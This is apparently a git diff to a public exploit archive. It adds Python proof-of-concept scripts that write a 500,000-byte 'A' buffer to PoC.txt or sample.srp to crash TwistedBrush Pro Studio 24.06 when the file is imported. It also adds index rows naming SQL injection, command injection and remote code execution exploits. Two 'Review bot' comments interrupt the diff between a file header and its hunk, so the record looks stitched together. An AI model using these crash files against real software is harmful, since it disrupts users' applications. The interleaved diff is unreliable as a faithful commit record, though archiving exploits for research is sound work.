+# 7.- Crashed
+
+buffer = "\x41" * 500000
+f = open ("PoC.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46845.py b/exploits/windows/dos/46845.py
new file mode 100755
index 000000000..910329678
--- /dev/null
+++ b/exploits/windows/dos/46845.py
@@ -0,0 +1,20 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC)
+# Date: 13/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.pixarra.com
+# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe
+# Version: 24.06
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "TwistedBrush_player.py", it will create a new file "sample.srp"
+# 2.- Open TwistedBrush Pro Studio
+# 3.- Go to 'Record' > 'Script Player...'
+# 4.- Click 'Import' button, select the 'sample.srp' file created and click 'Open' button
+# 5.- Crashed
+
+buffer = "\x41" * 500000
+f = open ("sample.srp", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 3dc6fb404..cc245b1cc 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
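Review bot: The 500000-byte payload is written through a text-mode handle (`open ("PoC.txt", "w")`); that is harmless today because the buffer holds only `\x41`, but anyone extending the pattern with `\n` or `\r` bytes will get silent newline translation on Windows, so `open("PoC.txt", "wb")` is the safer mode for a raw payload. A `with` block (`with open("PoC.txt", "wb") as f:` / `    f.write(buffer)`) also closes the handle before the script exits instead of relying on interpreter teardown. As with the sibling PoCs, `# 7.- Crashed` records no exception or faulting module, so the entry establishes a DoS only; and step 1's `TwistedBrush_recorder.py` does not match the committed `46844.py`.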
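Review bot: `sample.srp` is an opaque file handed to the Script Player importer, yet it is created with text mode `"w"`; with this payload no translation occurs, but a file meant to be parsed byte-for-byte should be written as `open("sample.srp", "wb")` so a future payload containing `\n` or `\r` is not rewritten by Windows newline translation. The open/write/close triple should also become `with open("sample.srp", "wb") as f:` / `    f.write(buffer)`, which closes the file deterministically before the user is asked to import it. Step 5 says only `Crashed`, so the entry supports a DoS and nothing more; whether the importer copies the file into a fixed-size buffer is not shown here and should not be assumed. Step 1 names `TwistedBrush_player.py`, which does not match the committed `46845.py`.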
@@ -6422,6 +6422,10 @@ id,file,description,date,author,type,platform,port
 46830,exploits/windows/dos/46830.py,"SpotMSN 2.4.6 - Denial of Service (PoC)",2019-05-13,"Victor Mondragón",dos,windows,
 46831,exploits/windows/dos/46831.py,"DNSS 2.1.8 - Denial of Service (PoC)",2019-05-13,"Victor Mondragón",dos,windows,
 46837,exploits/multiple/dos/46837.html,"Google Chrome V8 - Turbofan JSCallReducer::ReduceArrayIndexOfIncludes Out-of-Bounds Read/Write",2019-05-13,"Google Security Research",dos,multiple,
+46842,exploits/windows/dos/46842.py,"Selfie Studio 2.17 - 'Resize Image' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
+46843,exploits/windows/dos/46843.py,"TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
+46844,exploits/windows/dos/46844.py,"TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
+46845,exploits/windows/dos/46845.py,"TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -17401,6 +17405,7 @@ id,file,description,date,author,type,platform,port
 46812,exploits/windows_x86/remote/46812.rb,"Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit)",2019-05-08,Metasploit,remote,windows_x86,
 46813,exploits/multiple/remote/46813.rb,"PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)",2019-05-08,Metasploit,remote,multiple,5432
 46814,exploits/multiple/remote/46814.rb,"Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)",2019-05-08,Metasploit,remote,multiple,7001
+46839,exploits/php/remote/46839.rb,"PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit)",2019-05-14,AkkuS,remote,php,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41263,3 +41268,7 @@ id,file,description,date,author,type,platform,port
 46834,exploits/php/webapps/46834.txt,"SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin)",2019-05-13,LiquidWorm,webapps,php,
 46835,exploits/php/webapps/46835.txt,"XOOPS 2.5.9 - SQL Injection",2019-05-13,"felipe andrian",webapps,php,80
 46838,exploits/php/webapps/46838.txt,"OpenProject 5.0.0 - 8.3.1 - SQL Injection",2019-05-13,"SEC Consult",webapps,php,
+46840,exploits/php/webapps/46840.txt,"Sales ERP 8.1 - Multiple SQL Injection",2019-05-14,"Mehmet EMIROGLU",webapps,php,80
+46841,exploits/hardware/webapps/46841.txt,"D-Link DWL-2600AP - Multiple OS Command Injection",2019-05-14,"Raki Ben Hamouda",webapps,hardware,
+46846,exploits/php/webapps/46846.txt,"Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection",2019-05-14,"Julien Ahrens",webapps,php,80
+46847,exploits/php/webapps/46847.txt,"PasteShr 1.6 - Multiple SQL Injection",2019-05-14,"Mehmet EMIROGLU",webapps,php,80